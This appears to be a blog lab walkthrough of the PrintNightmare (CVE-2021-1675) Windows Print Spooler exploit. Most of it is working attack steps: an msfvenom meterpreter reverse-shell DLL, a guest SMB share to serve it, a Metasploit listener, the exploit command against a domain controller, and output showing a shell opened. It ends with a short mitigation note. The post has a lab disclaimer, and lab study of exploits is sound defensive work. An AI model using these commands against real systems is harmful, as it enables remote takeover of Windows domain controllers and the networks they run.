OK so this one is doing the rounds on Twitter. A couple of researchers accidently released their code for a vulnerability in the Windows Printer Spooler service. This same service was hit with Stuxnet many moons ago. The vulnerability is a 0day, as the patch that was supposed to fix it does not at the current time of writing this article. Windows 8 and above are impacted by this bug. The vulnerability allows for local and remote privilege escalation. If you do a search on Github for ‘CVE-2021-1675’ you will find a bunch of remote and local public exploits.
Now, on to the Lab!
Disclaimer: this is a test lab environment, not production. Never run exploits or mess with production environments without explicit permission.
1. Setup a Virtual Machine environment. I am using VMware Workstation.
2. Setup 1 x Windows 2019 DC VM and 1 x Kali Linux VM,
3. Create a domain user on the DC and make sure its password is set (not flagged for change at login).
4. For the sake of this Lab, disable Windows Defender. Obfuscating and bypassing AV is out of scope for the payload in this exercise.
5. On the 2019 DC enable guest logins for SMB. This is in lieu of setting up a member server to host your payload dll / modifying the exploit to connect to a share with a password etc.
To enable guest SMB:
start > run > gpedit.msc. Computer Configuration > Administrative Templates > Network > Lanman Workstation > Enable insecure guest logons.
1. Download the python exploit from cube0x0’s Github
2. Install the impacket forked version:
git clone https://github.com/cube0x0/impacket
python3 ./setup.py install
3. From Kali Terminal generate the payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.1.1.10 LPORT=4444 -f dll > shell-cmd.dll
Now move the dll to the tmp:
cp ./shell-cmd.dll /tmp
4. Setup your smb share:
Edit your /etc/samba/smb.conf to be:
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = smbuser
5. Add a local user named smbuser and add it to samba:
sudo useradd smbuser
sudo smbpasswd -a smbuser
6. Now setup the metasploit listener. You can use revshells.com to generate these:
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.1.1.10; set lport 4444; exploit"
7. Run the exploit:
kali@kali:~/impacket$ ./CVE-2021-1675.py domain.local/dummy:Testing12345@10.1.1.1 '\\10.1.1.10\smb\shell-cmd.dll'
8. Check back to your metasploit listener:
msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.1.1.10:4444
[*] Sending stage (201283 bytes) to 10.1.1.1
[*] Meterpreter session 7 opened (10.1.1.10:4444 -> 10.1.1.1:65128) at 2021-07-01 08:42:15 -0400
meterpreter > shell
Process 5324 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1282] (c) 2018 Microsoft Corporation. All rights reserved.
I found that after the meterpreter session closed, the Spooler service on the DC would crash. Simply start it again from services.msc on the DC.
The exploit has multiple stages and retries. In my lab it worked on the first one and then reported failure on the second. Meterpreter shell had already connected though 🙂
Current mitigation centres around disabling Printer Spooler service on all domain PC’s until the patch is out.